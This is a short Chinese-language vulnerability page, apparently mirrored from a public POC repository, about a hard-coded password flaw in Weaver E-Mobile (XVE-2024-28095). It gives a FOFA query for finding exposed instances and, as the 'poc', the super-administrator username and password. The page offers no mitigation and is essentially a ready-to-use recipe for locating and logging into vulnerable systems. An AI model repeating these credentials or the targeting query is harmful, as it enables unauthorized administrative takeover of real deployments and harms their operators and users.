mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
20 lines
450 B
Markdown
20 lines
450 B
Markdown
# 泛微E-Mobile硬编码口令漏洞(XVE-2024-28095)
|
||
|
||
泛微E-Mobile 存在硬编码口令漏洞,未经身份验证的远程攻击者可利用该口令以超级管理员身份登录管理后台,导致网站处于极度不安全状态。
|
||
|
||
## fofa
|
||
|
||
```javascript
|
||
app="泛微-EMobile"
|
||
```
|
||
|
||
## poc
|
||
|
||
```javascript
|
||
账号:msgadmin
|
||
密码:Weaver#2012!@#
|
||
```
|
||
|
||

|
||
|